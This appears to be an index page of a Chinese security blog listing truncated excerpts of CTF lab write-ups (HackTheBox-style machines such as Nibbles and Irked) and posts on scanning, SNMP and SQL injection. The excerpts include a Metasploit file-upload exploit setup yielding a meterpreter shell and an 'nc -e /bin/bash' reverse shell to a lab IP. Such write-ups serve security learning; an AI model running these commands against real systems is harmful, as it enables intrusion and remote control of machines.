Calamity(web rce) nikto -h 10.10.10.27 Allowed HTTP Methods: OPTIONS, GET, HEAD, POST OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote 2019-03-21 部署过程 安全工具 渗透测试 Web漏洞利用
Apocalyst(CTF-like) 12345678922/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)| 256 76:92:39:0a:57:bd:f0:03:2 2019-03-21 部署过程 安全工具 渗透测试 CTF挑战
shell-script(二) 案例三:写一个bash script,目的是扫描40台主机的全部端口,服务版本,生成以IP为目录的扫描结果。案例三:写一个bash script,目的是扫描40台主机的全部端口,服务版本,生成以IP为目录的扫描结果。categories: - linux案例三:写一个bash script,目的是扫描40台主机的全部端口,服务版本,生成以IP为目录的扫描结果。 扫描网段内在线主机 1234nma 2019-03-21 运维 编程 部署过程 安全工具 网络扫描
cronOS(域名查询) cat /etc/passwd | grep homeps -ef | grep rootroot 1083 1 0 Mar15 ? 00:00:00 /usr/sbin/cron -f 123#### mysql /var/www/admin/config.phpadmin 2019-03-16 安全工具 域渗透 渗透测试 Laravel安全 密码破解
Nibbles(sudo no pass ) 文件上传获得shell12345678use exploit/multi/http/nibbleblog_file_uploadset RHOSTS 10.10.10.75set USERNAME adminset PASSWORD nibblesset TARGETURI /nibbleblogrun获得meterpreter shell 提权参考以前做过的方式LTR Scene(php写入一句 2019-03-14 部署过程 安全工具 渗透测试 靶机渗透
Carrier(snmp泄露敏感信息) ifconfig123456789101112131415161718192021222324252627282930313233343536ifconfigeth0 Link encap:Ethernet HWaddr 00:16:3e:d9:04:ea inet addr:10.99.64.2 Bcast:10.99.64.255 Mask:255.255 2019-03-12 运维 网络设置 渗透测试 安全开发 SNMP安全
snmp&snmpwalk 161端口——snmp协议参考资料: http://www.freebuf.com/vuls/133517.html http://www.cnblogs.com/LittleHann/p/3834860.htmlcategories: tools 161端口——snmp协议参考资料: http://www.freebuf.com/vuls/133517.html http://www 2019-03-11 运维 网络设置 安全工具 协议分析
Irked(suid提权) 1 root ircd 43 Mar 10 03:58 listusers cd /usr/bin/; ./viewuser结果/bin/nc: /bin/nc: cannot execute binary file nc -e /bin/bash 10.10.14.7 2233  uname -aLinux LazyClown 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux i686说明是32位的系统版本 1234567成功反弹shell## 提权新建cat文件,内容是shell脚本。当suid程序执行ca 2019-03-09 过程记录 安全工具 渗透测试 密码学攻击
03-08-sql-inject scan123480/tcp open http cloudflare443/tcp open ssl/https cloudflare8080/tcp open http-proxy cloudflare8443/tcp open ssl/https-alt cloudflare 确认为一个web server,有云防护,不允许直接ip访问 pin 2019-03-08 部署过程 过程记录 安全工具 渗透测试 SQL注入